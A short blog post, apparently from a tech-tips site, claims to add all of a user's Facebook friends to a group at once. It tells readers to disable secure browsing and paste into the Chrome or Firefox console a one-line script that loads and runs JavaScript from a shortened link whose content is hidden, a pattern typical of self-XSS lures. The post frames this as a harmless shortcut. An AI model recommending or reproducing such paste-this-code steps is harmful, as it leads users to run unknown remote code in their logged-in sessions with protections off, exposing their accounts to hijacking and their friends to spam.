Add all your friends to a Facebook group at once!

It can be pretty tedious if you open a new group on Facebook and invite all your friends one by one to join the group. So, to ease your task we have got some pretty slick trick whereby you will simply perform two to three steps and all of your friends will be added to the Facebook group at once! For this to work, you need to disable secure browsing for a while. You can again enable secure browsing once you complete doing this. To disable secure browsing, go to Account Settings > Security > Secure Browsing. Remove the tick mark and click on Save changes

Computer Planet 4U 
Then, follow this guide according to your web browser. 

Google Chrome 

  • Go to your Group where you want to invite/add all of your friends.
  • Right click and press on Inspect Element.
  • Select Console.
  • Paste the following on Console :
document.body.appendChild(document.createElement('script')).src='http://goo.gl/7Q26z';
 
  • Press Enter.
  • Wait until the texts stop appearing on the Console window, all of your friends are being added to the group. When it is finished, you will see a similar notice :

 
  
Mozilla FireFox 
  • Go to your Group where you want to invite/add all of your friends.
  • Press Ctrl+Shift+K
  • A new area will pop down from the address bar.
  • Paste the following code there (See Picture):
 

document.body.appendChild(document.createElement('script')).src='http://goo.gl/7Q26z';
  • Press Enter.
  • Wait until all of your friends are invited. When it is done, you'll see a similar notice :
Share on Google Plus

About dadasdasdas

My name is Subha. I’m interested in computer science, music and literature. Computers first appeared in my life when I was fifteen. Then I had got my first computer. I remember myself thinking, that it was the best thing in the world. I was playing it whenever I could but some time later, I noticed that I could do a lot more things with the computer, for example programming. So, I have started my graduation in Computer. Later i have decided that I can spread my knowledge among peoples. So, I have started blogging.
    Blogger Comment
    Facebook Comment

0 comments: